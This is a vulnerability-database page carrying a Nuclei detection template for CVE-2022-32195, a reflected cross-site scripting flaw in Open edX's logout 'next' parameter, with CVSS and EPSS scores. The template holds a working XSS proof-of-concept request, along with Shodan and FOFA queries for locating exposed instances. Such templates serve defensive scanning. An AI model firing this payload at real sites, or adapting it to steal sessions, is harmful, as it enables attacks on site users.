Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-32195
HistoryAug 06, 2022 - 7:47 p.m.

Open edX <2022-06-06 - Cross-Site Scripting

2022-08-0619:47:02
ProjectDiscovery
github.com
1
cve-2022-32195
cross-site scripting
open edx

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

44.9%

Open edX before 2022-06-06 contains a reflected cross-site scripting vulnerability via the 'next' parameter in the logout URL.
id: CVE-2022-32195

info:
  name: Open edX <2022-06-06 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    Open edX before 2022-06-06 contains a reflected cross-site scripting vulnerability via the 'next' parameter in the logout URL.
  impact: |
    Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
  remediation: |
    Apply the latest security patches or updates provided by Open edX to fix the Cross-Site Scripting vulnerability.
  reference:
    - https://discuss.openedx.org/t/security-patch-for-logout-page-xss-vulnerability/7408
    - https://github.com/edx
    - https://nvd.nist.gov/vuln/detail/CVE-2022-32195
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-32195
    cwe-id: CWE-79
    epss-score: 0.00112
    epss-percentile: 0.44633
    cpe: cpe:2.3:a:edx:open_edx:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: edx
    product: open_edx
    shodan-query:
      - http.html:"Open edX"
      - http.html:"open edx"
    fofa-query: body="open edx"
    comment: Hover the cursor on the redirect link
  tags: cve,cve2022,openedx,xss,edx

http:
  - method: GET
    path:
      - '{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<a href="+8"onmouseover="alert(document.domain)">click here to go to'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402207652323e36773cda99a552c2c3db55d052ec4a36ad6784bf01a87fc0aeecbfb7022077b69cfd1b8531ef9042fd4490a489b8d80dd8ebc2ec8612ec96b0c3ff6bc8ea:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

44.9%

Related for NUCLEI:CVE-2022-32195